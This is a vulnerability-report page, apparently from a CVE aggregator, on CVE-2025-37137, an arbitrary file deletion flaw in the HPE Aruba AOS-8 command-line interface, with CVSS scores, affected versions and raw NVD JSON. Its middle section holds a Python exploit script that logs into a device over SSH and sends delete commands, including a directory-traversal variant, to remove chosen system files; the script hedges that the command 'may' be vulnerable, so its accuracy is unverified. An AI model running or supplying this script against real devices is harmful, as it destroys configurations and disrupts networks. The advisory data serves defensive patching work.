Security Vulnerability Report
中文
CVE-2025-37137 CVSS 6.5 MEDIUM

CVE-2025-37137

Published: 2025-10-14 17:15:40
Last Modified: 2025-11-12 21:06:42
Source: [email protected]

Description

Arbitrary file deletion vulnerabilities have been identified in the command-line interface of an AOS-8 Controller/Mobility Conductor. Successful exploitation of these vulnerabilities could allow an authenticated remote malicious actor to delete arbitrary files within the affected system.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:arubanetworks:arubaos:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:arubanetworks:arubaos:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:arubanetworks:arubaos:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:arubanetworks:arubaos:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:arubanetworks:arubaos:*:*:*:*:*:*:*:* - VULNERABLE
HPE Aruba Networking AOS-8 Controller(具体受影响版本请参考HPE官方安全公告hpesbnw04957en_us)
HPE Aruba Networking AOS-8 Mobility Conductor(具体受影响版本请参考HPE官方安全公告hpesbnw04957en_us)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-37137 - HPE Aruba AOS-8 CLI Arbitrary File Deletion PoC # This PoC demonstrates the concept of exploiting arbitrary file deletion # via the AOS-8 CLI interface with high-privilege authenticated access. import paramiko import sys def exploit_aruba_cli(target_ip, port, username, password, target_file): """ Exploit arbitrary file deletion vulnerability in HPE Aruba AOS-8 CLI. Prerequisites: - Valid high-privilege credentials (admin/root level) on the AOS-8 device - Network access to the SSH/CLI management interface Args: target_ip: IP address of the AOS-8 Controller/Mobility Conductor port: SSH port (default: 22) username: High-privilege username password: Password for authentication target_file: Absolute path of the file to delete (e.g., /flash/config.cfg) """ try: # Establish SSH connection to the AOS-8 device client = paramiko.SSHClient() client.set_missing_host_key_policy(paramiko.AutoAddPolicy()) client.connect(target_ip, port=port, username=username, password=password, timeout=10) # Invoke an interactive shell session on the CLI shell = client.invoke_shell() # Enter enable mode (requires high privilege) shell.send('enable\n') import time time.sleep(1) # Attempt arbitrary file deletion via path traversal / absolute path # The vulnerable CLI command may accept unsanitized file paths delete_cmd = f'delete flash:/{target_file}\n' shell.send(delete_cmd) time.sleep(1) # Alternative: directory traversal to delete arbitrary system files traversal_cmd = f'delete flash:/../../..{target_file}\n' shell.send(traversal_cmd) time.sleep(1) # Read output output = shell.recv(65535).decode('utf-8', errors='ignore') print(f"[*] Command output:\n{output}") client.close() print(f"[+] Exploitation attempt completed against {target_ip}") except Exception as e: print(f"[-] Exploitation failed: {e}") sys.exit(1) if __name__ == "__main__": if len(sys.argv) != 6: print(f"Usage: {sys.argv[0]} <target_ip> <port> <username> <password> <target_file>") print(f"Example: {sys.argv[0]} 192.168.1.1 22 admin password123 /flash/config.cfg") sys.exit(1) exploit_aruba_cli(sys.argv[1], int(sys.argv[2]), sys.argv[3], sys.argv[4], sys.argv[5])

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-37137", "sourceIdentifier": "[email protected]", "published": "2025-10-14T17:15:40.413", "lastModified": "2025-11-12T21:06:42.430", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Arbitrary file deletion vulnerabilities have been identified in the command-line interface of an AOS-8 Controller/Mobility Conductor. Successful exploitation of these vulnerabilities could allow an authenticated remote malicious actor to delete arbitrary files within the affected system."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:H", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.2}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-284"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:arubanetworks:arubaos:*:*:*:*:*:*:*:*", "versionStartIncluding": "8.10.0.0", "versionEndExcluding": "8.10.0.19", "matchCriteriaId": "3D5F48C7-AD51-4641-9CBA-9DE9B516819E"}, {"vulnerable": true, "criteria": "cpe:2.3:o:arubanetworks:arubaos:*:*:*:*:*:*:*:*", "versionStartIncluding": "8.12.0.0", "versionEndExcluding": "8.12.0.6", "matchCriteriaId": "057AA8F5-FF66-44E9-8E06-D2B9E8B91AD2"}, {"vulnerable": true, "criteria": "cpe:2.3:o:arubanetworks:arubaos:*:*:*:*:*:*:*:*", "versionStartIncluding": "8.13.0.0", "versionEndExcluding": "8.13.1.0", "matchCriteriaId": "D4B066B5-D01B-43AE-B4DC-AF560D6B953C"}, {"vulnerable": true, "criteria": "cpe:2.3:o:arubanetworks:arubaos:*:*:*:*:*:*:*:*", "versionStartIncluding": "10.4.0.0", "versionEndExcluding": "10.4.1.9", "matchCriteriaId": "04F61E46-8412-4B8D-BE7B-EBF61BE52C54"}, {"vulnerable": true, "criteria": "cpe:2.3:o:arubanetworks:arubaos:*:*:*:*:*:*:*:*", "versionStartIncluding": "10.7.0.0", "versionEndExcluding": "10.7.2.1", "matchCriteriaId": "BEF8618F-C126-4F8F-951F-6D62FE8FAB22"}]}]}], "references": [{"url": "https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbnw04957en_us&docLocale=en_US", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.